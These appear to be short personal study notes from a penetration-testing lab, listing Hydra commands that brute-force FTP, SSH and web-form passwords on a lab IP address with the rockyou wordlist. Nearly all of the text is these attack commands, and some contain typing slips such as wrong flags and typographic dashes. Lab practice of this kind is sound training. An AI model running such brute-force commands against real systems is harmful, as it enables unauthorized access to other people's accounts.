- Hydra to brute force passwords - https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/
· https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/
From Kali box
https://linuxhint.com/crack-web-based-login-page-with-hydra-in-kali-linux/
A. To brute force an FTP password
B. hydra -l user -P passlist.txt ftp://10.10.31.82
C. –l (lowercase is exact name) –L (List of names)
D. ^user^ is username
E. ^passlist.txt^ is full route to list of passwords
From Kali box
A. To brute force ssh
B. hydra -l <username> -P <full path to pass> 10.10.31.82 ssh –vv –f
C. hydra –l molly –p /usr/share/wordlists/rockyou.txt 10.10.31.82 ssh –vV –f
From Kali box
A. to brute force webpage
B. hydra –l molly –P /usr/share/wordlists/rockyou.txt 10.10.31.82 http-post-form “/:username=^USER^&password=^PASS^:F=incorrect” –vV –f